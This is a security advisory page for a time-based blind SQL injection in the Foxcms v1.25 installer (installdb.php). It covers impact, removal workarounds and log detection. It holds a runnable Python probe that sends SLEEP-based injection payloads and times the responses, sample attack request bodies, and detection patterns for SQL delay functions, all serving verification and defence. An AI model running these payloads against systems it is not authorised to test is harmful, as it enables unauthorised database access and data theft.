CVE-2025-46154

8.4 HIGH

📋 TL;DR

Foxcms v1.25 contains a time-based blind SQL injection in the dbname parameter of installdb.php. An unauthenticated attacker can inject arbitrary SQL into the database connection request the installer builds, reading results back through response delays. Only installations still exposing installdb.php from the vulnerable version are affected.

💻 Affected Systems

Products:
  • Foxcms
Versions: v1.25
Operating Systems: All
Default Config Vulnerable: ⚠️ Yes
Notes: Vulnerability exists in the installation script, affecting fresh installations and potentially systems where installation files weren't removed.

📦 What is this software?

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete database compromise: data theft, data manipulation, or, where the database account holds file-write or similar dangerous privileges, remote code execution through database functions.

🟠

Likely Case

Database information disclosure and data extraction (slow, since a blind time-based injection leaks roughly one bit per delayed response), plus potential privilege escalation within the database.

🟢

If Mitigated

Limited impact with proper input validation and database permission restrictions in place.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

The time-based injection requires no authentication, and a public proof of concept is available.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Unknown

Vendor Advisory: Unknown

Restart Required: No

Instructions:

No official patch is available. Remove installdb.php once installation completes, or block access to it at the web server.

🔧 Temporary Workarounds

Remove installation files

linux

Delete the vulnerable installdb.php after installation, or, if the file must stay in place, make it unreadable to the web server account (the two commands are alternatives; chmod cannot follow a successful rm)

rm /path/to/foxcms/installdb.php
# or, if the file must remain on disk:
chmod 000 /path/to/foxcms/installdb.php

Input validation

all

Restrict the dbname parameter in installdb.php to a strict allowlist before it reaches any query (for a MySQL-style identifier, letters, digits and underscore only, at most 64 characters) and never interpolate it into SQL text; treat this as a stopgap until the installer is removed

🧯 If You Can't Patch

  • Remove or disable the installdb.php file after installation
  • Implement web application firewall rules to block SQL injection patterns

🔍 How to Verify

Check if Vulnerable:

Check whether installdb.php exists and is reachable over HTTP. On systems you are authorised to test, send time-based SQL injection payloads against the dbname parameter and compare response times with an unmodified baseline; repeat the measurement, since load-induced latency can mimic an injected delay.

Check Version:

Check Foxcms version in configuration files or admin panel

Verify Fix Applied:

Confirm installdb.php is removed or returns an access-denied or not-found response. Re-run the time-based payloads and verify that response times no longer track the requested delay.
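The verification steps above, as an added example rather than code from the advisory or from Foxcms: a differential timing check that treats a delay as confirmed only when the response time scales with the requested SLEEP argument, so a merely slow server is not mistaken for an injectable one. It assumes (hypothetically) that installdb.php takes the database name in a POST field named dbname and that the backend is MySQL; the transport is a plain callable, so the logic runs offline against a simulated server and only touches a live host when you pass its URL.

```python
"""Differential timing check for a time-based SQL injection point.

Added example for this advisory, not Foxcms code. It assumes (hypothetically)
that installdb.php takes the database name in a POST field named "dbname" and
that the backend is MySQL, so SLEEP(n) is the time primitive. The transport is
a plain callable, so the decision logic can be exercised offline against a
simulated server and only run against a live host with authorisation.
"""
import re
import statistics
import time
import urllib.parse
import urllib.request
from typing import Callable, Dict, List, Sequence

# A sender posts the form fields and returns the elapsed time in seconds.
Sender = Callable[[Dict[str, str]], float]

BENIGN_DBNAME = "foxcms"  # a plausible legitimate value, used as the baseline


def sleep_payload(delay: int) -> str:
    """Assumed injection syntax: break out of a quoted literal and call SLEEP."""
    return f"{BENIGN_DBNAME}' AND SLEEP({delay})-- -"


def median_elapsed(send: Sender, fields: Dict[str, str], samples: int) -> float:
    # The median resists a single slow outlier better than the mean.
    return statistics.median(send(fields) for _ in range(samples))


def is_time_injectable(
    send: Sender,
    samples: int = 3,
    delays: Sequence[int] = (3, 6),
    tolerance: float = 0.5,
) -> bool:
    """True only when response time tracks the requested SLEEP argument.

    A single delayed request is not enough: a loaded server is slow for every
    request. Each probe must exceed the baseline by its delay, and successive
    delays must add roughly the extra time they asked for.
    """
    baseline = median_elapsed(send, {"dbname": BENIGN_DBNAME}, samples)
    extra: List[float] = []
    for delay in delays:
        observed = median_elapsed(send, {"dbname": sleep_payload(delay)}, samples)
        if observed < baseline + delay - tolerance:
            return False
        extra.append(observed - baseline)
    return all(
        extra[i + 1] - extra[i] >= (delays[i + 1] - delays[i]) - tolerance
        for i in range(len(delays) - 1)
    )


def http_sender(url: str, timeout: float = 30.0) -> Sender:
    """Real transport: POST the fields to `url` and time the round trip."""
    def send(fields: Dict[str, str]) -> float:
        data = urllib.parse.urlencode(fields).encode()
        start = time.monotonic()
        try:
            urllib.request.urlopen(url, data=data, timeout=timeout).read()
        except OSError:
            pass  # an HTTP error or timeout still counts as elapsed time
        return time.monotonic() - start
    return send


def simulated_server(base_latency: float, vulnerable: bool) -> Sender:
    """Offline stand-in: honours SLEEP(n) only when `vulnerable` is set."""
    def send(fields: Dict[str, str]) -> float:
        match = re.search(r"SLEEP\((\d+)\)", fields.get("dbname", ""))
        if vulnerable and match:
            return base_latency + int(match.group(1))
        return base_latency
    return send


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else None
    sender = http_sender(target) if target else simulated_server(0.2, vulnerable=True)
    print("time-based injection:", "CONFIRMED" if is_time_injectable(sender) else "not observed")
```

Run it with no argument to see the decision logic against the simulated vulnerable server; pass the installer URL (for example http://host/installdb.php, an assumed path) to probe a host you are allowed to test. The same function, pointed at a host after the file has been removed or blocked, is the "verify fix applied" check: every probe then returns an error at baseline speed and the result is "not observed".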

📡 Detection & Monitoring

Log Indicators:

  • Unusual POST requests to installdb.php with SQL keywords
  • Long response times from installdb.php requests

Network Indicators:

  • HTTP POST requests to installdb.php whose body contains SQL delay syntax such as SLEEP(), BENCHMARK(), or WAITFOR DELAY, including mixed-case and URL-encoded variants

SIEM Query:

source="web_logs" AND uri="/installdb.php" AND (request_body CONTAINS "SLEEP" OR request_body CONTAINS "BENCHMARK" OR request_body CONTAINS "WAITFOR")

Decode the request body and match case-insensitively before applying this rule: a literal CONTAINS "SLEEP" misses "sleep(", "%53LEEP" and comment-split forms such as "SL/**/EEP".
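The log and network indicators above, turned into runnable detection logic as an added example (not part of the advisory). It assumes a proxy or WAF log in JSON lines that records the request body; the field names uri, request_body, duration_ms and src_ip are assumptions to map onto your own schema, and the sample records are constructed. It goes slightly beyond the page's list by also matching the PostgreSQL and Oracle delay primitives.

```python
"""Flag time-based SQL injection attempts against installdb.php in request logs.

Added example, not part of the original advisory. It assumes a proxy or WAF
log in JSON lines that records the request body (field names below are
assumptions; map them to your own schema). The sample records are constructed.
"""
import json
import re
import urllib.parse
from typing import Dict, Iterable, List

TARGET_PATH = "/installdb.php"
SLOW_MS = 3000  # the installer should answer fast; long responses hint at SLEEP/BENCHMARK

# Delay primitives for MySQL, PostgreSQL, MSSQL and Oracle, matched after normalisation.
TIME_FUNCS = re.compile(
    r"\b(sleep|benchmark|pg_sleep)\s*\(|\bwaitfor\s+delay\b|\bdbms_lock\.sleep\b",
    re.IGNORECASE,
)


def normalise(body: str) -> str:
    """Undo the cheap evasions a naive CONTAINS "SLEEP" rule misses."""
    text = body
    for _ in range(2):                       # double URL-encoding
        text = urllib.parse.unquote_plus(text)
    text = re.sub(r"/\*.*?\*/", "", text)    # inline comments: SL/**/EEP(5)
    return re.sub(r"\s+", " ", text)         # tabs/newlines used as separators


def classify(record: Dict) -> List[str]:
    """Return the reasons a record is suspicious (empty list if it is not)."""
    reasons: List[str] = []
    if not urllib.parse.urlsplit(record.get("uri", "")).path.endswith(TARGET_PATH):
        return reasons
    if TIME_FUNCS.search(normalise(record.get("request_body", ""))):
        reasons.append("time-based SQL primitive in request body")
    if record.get("duration_ms", 0) >= SLOW_MS:
        reasons.append(f"slow response ({record['duration_ms']} ms)")
    return reasons


def detect(lines: Iterable[str]) -> List[Dict]:
    """Parse JSON log lines and return one alert per suspicious record."""
    alerts = []
    for line in lines:
        if not line.strip():
            continue
        record = json.loads(line)
        reasons = classify(record)
        if reasons:
            alerts.append({
                "src_ip": record.get("src_ip"),
                "reasons": reasons,
                "decoded_body": normalise(record.get("request_body", "")),
            })
    return alerts


# Constructed sample: a legitimate install, an obvious probe, a double-encoded
# and comment-split probe, noise on another path, and an unexplained slow hit.
SAMPLE_LOG = """
{"src_ip": "10.0.0.5", "method": "POST", "uri": "/installdb.php", "request_body": "dbhost=localhost&dbname=foxcms&dbuser=fox", "duration_ms": 120}
{"src_ip": "203.0.113.7", "method": "POST", "uri": "/installdb.php", "request_body": "dbhost=localhost&dbname=foxcms'+AND+SLEEP(5)--+-&dbuser=fox", "duration_ms": 5100}
{"src_ip": "203.0.113.7", "method": "POST", "uri": "/installdb.php?step=2", "request_body": "dbname=foxcms%2527%2520AND%2520sl%252F%252A%252A%252Feep%25285%2529--%2520-", "duration_ms": 700}
{"src_ip": "10.0.0.9", "method": "POST", "uri": "/index.php", "request_body": "q=sleep(1)", "duration_ms": 80}
{"src_ip": "198.51.100.2", "method": "POST", "uri": "/installdb.php", "request_body": "dbname=foxcms", "duration_ms": 4500}
""".strip().splitlines()


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert["src_ip"], "|", "; ".join(alert["reasons"]), "|", alert["decoded_body"])
```

The slow-response rule stands on its own because a probe that evades the keyword match still has to wait for the delay it requested; the keyword rule stands on its own because a probe with a short SLEEP value may not cross the latency threshold. Tune SLOW_MS to the installer's normal response time on your host.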

🔗 References
